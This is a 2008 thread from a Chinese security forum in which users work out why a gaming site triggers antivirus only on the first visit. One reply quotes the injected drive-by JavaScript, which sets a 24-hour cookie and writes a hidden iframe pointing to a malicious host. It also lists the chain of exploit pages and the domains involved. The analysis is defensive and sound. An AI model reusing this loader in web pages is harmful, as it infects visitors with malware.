收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) 奇怪的网站
返回列表 发新帖
查看: 2254|回复: 9
收起左侧

[已鉴定] 奇怪的网站

 关闭 [复制链接]
浙江一哥
发表于 2008-11-26 18:33:48 | 显示全部楼层 |阅读模式
http://bbs.07073.com/  这网站不知道怎么回事 每次重装完系统之后进去就报毒 可第二次进去就不报了  真是不解
回复

举报

左手
发表于 2008-11-26 18:39:12 | 显示全部楼层
2008-11-26 18:37:31    加载库文件      操作:阻止
进程路径:D:\Program Files\GreenBrowser\GreenBrowser.exe
文件路径:C:\Program Files\Common Files\System\msadc\msadco.dll
触发规则:所有程序规则->禁止加载的库文件->*\msadco.dll
回复

举报

江湖的fans
发表于 2008-11-26 18:43:05 | 显示全部楼层
威胁描述:当前网页存在恶意脚本代码,您可以清除恶意代码继续浏览,或者选择不看这个网站,我们会自动帮助您搜索同类网站。

挂马网址:http://wm.sllwbd5.cn/a154/fxx.htm

病 毒 名:Exploit.Win32.Shellcode.Suspicious





病毒        2008-11-26  18:44:19        病毒在文件C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\CL8127GX\Real[1].htm中        JS.Agent.dg.3588        处理成功(操作:删除)
回复

举报

江湖的fans
发表于 2008-11-26 18:43:44 | 显示全部楼层
毒霸+畅游的!
回复

举报

lg560852
发表于 2008-11-26 19:08:56 | 显示全部楼层

http://%61%6C%69%6D%6F%6D%61%2E%63%6F%6D/header_bg.gif

var cookieString=document.cookie;
var start=cookieString.indexOf("cookiesleep");
if(start!=-1){}else{var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="cookiesleep=test;expires="+expires.toGMTString();
document.write("<iframe src=http://www.hryspao.cn/zzll/1.htm width=50 height=0 border=0></iframe>");}

这个段代码是根据你的COOKIES来判断的,你访问一次后就留下了COOKIES。
表现为24小时内再次访问该网址不再重复中招。
freshow日志:
Log is generated by FreShow.
[wide]http://bbs.07073.com/
    [script]http://%61%6C%69%6D%6F%6D%61%2E%63%6F%6D/header_bg.gif
        [frame]http://www.hryspao.cn/zzll/1.htm
            [frame]http://wm.sllwbd5.cn/a154/fxx.htm
                [frame]http://wm.sllwbd5.cn/a154/fx.htm
                    [frame]http://wm.sllwbd5.cn/a154/Ilink.html
                    [frame]http://wm.sllwbd5.cn/a154/flink.html
                [frame]http://wm.sllwbd5.cn/a154/ss.html
                [frame]http://wm.sllwbd5.cn/a154/MS06014.htm
                    [object]http://www.oiuytr.net/new/a154.css
                [frame]http://sllwbd5.cn/sina.htm
                [frame]http://sllwbd5.cn/UU.htm
                [frame]http://wm.sllwbd5.cn/a154/Thunder.html
                [frame]http://wm.sllwbd5.cn/a154/GLWORLD.html
                [frame]http://wm.sllwbd5.cn/a154/real.htm
                [frame]http://wm.sllwbd5.cn/a154/Real.html
回复

举报

恩丹西酮
发表于 2008-11-26 19:18:35 | 显示全部楼层
EAV3.0和超级巡警怎么没报啊
回复

举报

浙江一哥
 楼主| 发表于 2008-11-26 19:29:38 | 显示全部楼层
终于明白了为什么时有时无 谢谢老大
回复

举报

ue100
头像被屏蔽
发表于 2008-11-27 23:04:02 | 显示全部楼层
报4条
回复

举报

leonfg
发表于 2008-11-28 02:28:02 | 显示全部楼层
原帖由 江湖的fans 于 2008-11-26 18:43 发表
威胁描述:当前网页存在恶意脚本代码,您可以清除恶意代码继续浏览,或者选择不看这个网站,我们会自动帮助您搜索同类网站。

挂马网址:http://wm.sllwbd5.cn/a154/fxx.htm

病 毒 名:Exploit.Win32.Shellcode ...

temp-2.PNG
回复

举报

leonfg
发表于 2008-11-28 02:28:47 | 显示全部楼层
原帖由 lg560852 于 2008-11-26 19:08 发表

这个段代码是根据你的COOKIES来判断的,你访问一次后就留下了COOKIES。
表现为24小时内再次访问该网址不再重复中招。
freshow日志:

未命名.PNG
2008-11-28 2:26:42    HTTP filter    file   http://www.oiuytr.net/new/a154.css  probably a variant of Win32/Genetik trojan    connection terminated - quarantined    CHINESE-GUNDAM\GUNDAM    Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe.

[ 本帖最后由 leonfg 于 2008-11-28 02:31 编辑 ]
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 06:37 , Processed in 0.155853 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表